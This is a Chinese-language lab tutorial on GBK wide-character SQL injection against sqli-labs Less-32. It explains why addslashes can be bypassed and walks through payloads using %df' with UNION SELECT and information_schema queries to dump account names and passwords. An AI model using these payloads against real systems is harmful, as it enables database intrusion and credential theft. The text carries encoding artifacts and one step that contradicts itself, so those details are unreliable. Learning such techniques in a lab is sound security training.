【SQL注入09】宽字符注入基础与实操（基于sqlilabsless32）

1.1GBK编码简介

1. GBK全称《汉字内码扩展规范》。
2. GBK 采用双字节表示&＃xff0c;总体编码范围为 8140-FEFE&＃xff0c;首字节在 81-FE 之间&＃xff0c;尾字节在 40-FE 之间&＃xff0c;剔除 xx7F 一条线。总计 23940 个码位&＃xff0c;共收入 21886 个汉字和图形符号&＃xff0c;其中汉字&＃xff08;包括部首和构件&＃xff09;21003 个&＃xff0c;图形符号 883 个。
3. 常用字符GBK编码

URL编码规律

1. GET型的方式我们是以url形式提交的&＃xff0c;因此数据会通过url编码,其实url编码就是一个字符ascii码的十六进制。不过稍微有些变动&＃xff0c;需要在前面加上“%”。
2. 比如“\”&＃xff0c;它的ascii码是92&＃xff0c;92的十六进制是5c&＃xff0c;所以“\”的url编码就是%5c。那么汉字的url编码呢&＃xff1f;很简单&＃xff0c;看例子&＃xff1a;“胡”的ascii码是 -17670&＃xff0c;十六进制是BAFA&＃xff0c;url编码是“%BA%FA”。

1.2 宽字符注入

1. 定义&＃xff1a;正常情况下GPC开启或者使用addslashes函数过滤GET或POST提交的参数时&＃xff0c;我们测试输入的&＃39;&＃xff0c;就会被转义为\&＃39;&＃xff0c;无法成功闭合或者说逃逸。一般这种情况是不存在注入可能的&＃xff0c;但是有一种情况除外&＃xff0c;就是当后台数据库编码格式为GBK时&＃xff0c;可以添加字符欺骗转义函数&＃xff0c;&＃39;等不被转义。
2. 适用情形&＃xff1a;&＃xff08;1&＃xff09;数据库的编码格式为GBK&＃xff1b;&＃xff08;2&＃xff09;在PHP中&＃xff0c;通过iconv&＃xff08;&＃xff09;进行编码转换。
3. 原理&＃xff1a;加入字节与\构成GBK编码&＃xff0c;实现单引号和双引号逃逸。

2.1 实验平台

1. 靶机&＃xff1a;CentOS7安装docker&＃xff0c;利用docker部署sqli-labs来作为实验平台。具体部署过程可以参考文章《Docker上搭建sqli-labs漏洞环境》。
2. 真实机&＃xff1a;本实验利用火狐浏览器来实现&＃xff0c;为方便注入过程的编码&＃xff0c;建议安装一个扩展插件harkbar&＃xff0c;安装过程参考《HackBar免费版安装方法》由于该教程中的2.1.3harkbar我安装后无法正常使用&＃xff0c;就安装了HackBar Quantum来代替。
3. 靶机与真实机桥接到同一局域网中。

2.2 实验目标

1. 获取后台数据库账号及密码。

3.1 前戏

1. 真实机打开火狐浏览器&＃xff0c;访问靶机IP地址&＃xff0c;出现下图&＃xff0c;可以不重置实验平台&＃xff0c;直接点击Page2进入找到第32关实验。
   
2. 点击进入第32关&＃xff0c;初始界面如下图&＃xff1a;
   

3.2 判断注入点及注入类型

1. 输入参数为?id&＃61;1可以看到数据库成功返回第一个账户账号及密码。修改id&＃61;2则是返回第二个账号密码&＃xff0c;说明id是一个访问者可以控制输入的参数且页面会根据参数进行响应&＃xff0c;是一个注入点。
   
2. 修改参数为?id&＃61;1&＃39;可以看到数据库正常回显账号密码&＃xff0c;但是提示信息如下&＃xff0c;分析提示可知我们输入的单引号被转义成了\&＃39;。
   
3. 遇到这种情况只能赌后台数据库编码是不是GBK了&＃xff0c;修改参数为?id&＃61;1%df&＃39;&＃xff0c;按下图分析错误提醒信息可知该输入为字符型且为单引号闭合&＃xff0c;同时可知可以实现宽字符注入。
   

3.3 尝试使用union查询

1. 目的&＃xff1a;判断能否使用union联合查询注入。
2. 修改参数为?id&＃61;1%df&＃39; order by 3--&＃43;&＃xff0c;页面正常显示&＃xff0c;当修改参数为4时&＃xff0c;页面显示错误&＃xff0c;说明回显内容有3列。
   
3. 修改参数为?id&＃61;-1%df&＃39; union select 1,2,3--&＃43;&＃xff0c;可以看到2和3列数据可以回显。说明可以尝试union联合查询注入。
   

3.4 获取库名表名字段名

1. 获取库名。修改参数为?id&＃61;-1%df&＃39; union select 1,2,database()--&＃43;&＃xff0c;发现本站点数据库为security。
   
2. 获取表名。修改参数为?id&＃61;-1%df&＃39; union select 1,2,group_concat(table_name) from information_schema.tables where table_schema &＃61; database()--&＃43;&＃xff0c;发现该数据库下公有4个表&＃xff0c;其中有个users的表&＃xff0c;是我们注入的目标。
   
3. 获取字段名。修改参数为?id&＃61;-1%df&＃39; union select 1,2,group_concat(column_name) from information_schema.columns where table_name &＃61; &＃39;users&＃39;--&＃43;&＃xff0c;该参数执行失败了&＃xff0c;因为整个参数中的所有单引号都会被转义。
   
4. 用16进制代替英文字符串输入&＃xff0c;可以无需使用单引号来括住users&＃xff0c;很多工具可以将字符串转为16进制&＃xff0c;users转为16进制就是7573657273&＃xff0c;为了表示该数是16进制&＃xff0c;需要在前面加上0x。修改参数为?id&＃61;-1%df&＃39; union select 1,2,group_concat(column_name) from information_schema.columns where table_name &＃61;0x7573657273--&＃43;&＃xff0c;该参数执行失败了&＃xff0c;因为整个参数中的所有单引号都会被转义。
   
5. 获取字段内容。修改参数为?id&＃61;-1%df&＃39; union select 1,2,group_concat(id,0x3a,username,0x3a,password) from users--&＃43;&＃xff0c;该参数中0x3a是冒号的16进制格式&＃xff0c;同样也是为了避免使用单引号导致被转义的问题。
   

3.5 实验结果

在上一步成功爆出一堆账号密码&＃xff0c;实验成功。

1. 了解GBK编码简单信息&＃xff1b;
2. 理解字节何时会被当做GBK进行解码&＃xff1b;
3. 理解宽字符注入的原理&＃xff1b;
4. 掌握宽字符注入的方法。